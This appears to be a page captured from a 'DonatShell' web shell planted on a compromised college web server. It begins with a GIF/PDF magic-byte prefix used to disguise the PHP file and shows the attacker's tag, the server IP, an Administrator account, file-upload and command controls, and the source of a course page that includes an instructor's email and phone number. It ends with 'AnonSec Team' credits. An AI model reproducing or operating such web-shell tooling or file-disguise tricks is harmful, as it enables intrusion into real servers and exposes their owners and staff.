GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST2146/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST2146/InstructionalGuide.php
<?
// CST2146/InstructionalGuide.php
$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";

ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
require('application.phpinc');
require('Course/courseInfo.phpinc');
require('classInfo.phpinc');
$title = "Instructional Guide";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
require('common/pageHeader.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
require('common/sectionHeader.phpinc');
$week = 0;
?>
<fieldset><legend>Basic Class Operation</legend>
	<fieldset><legend>Lecture Format</legend>
		This class will follow the reading and assignments in the <?=$textbook['Title1']?> textbook. 
		Each week there will be a reading lesson with a discussion of student questions the following week.
		Besides textbook work there will be lab assignments and may be guest lecturers on various topics.
	</fieldset>

<fieldset><legend>Personalized Format</legend>
		This class is presented in personalized format.
		<br>
		All class assignments are available online.
		Each assignment has a due date so students may gauge their progress.
		An assignment need not be completed by the due date but all work must be completed by the end of the semester or session. 
		All class assignments should, however, be completed in the order given.
		<br>
		Contact Jim Martinson with any questions by email (<a href="mailto:Jim.Martinson@ridgewater.edu">Jim.Martinson@ridgewater.edu</a>) or phone (work: 320-234-8546).
	</fieldset>

</fieldset>

<fieldset><legend>Lessons and Assignments</legend>
Please see the <a href="Schedule.php">Schedule</a> for a list of lessons and assignments.
</fieldset>

<?
require('ReferencesResources.phpinc');
require('MichaelMalz/ContactInformation.phpinc');
require('common/sectionFooter.phpinc');
require('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team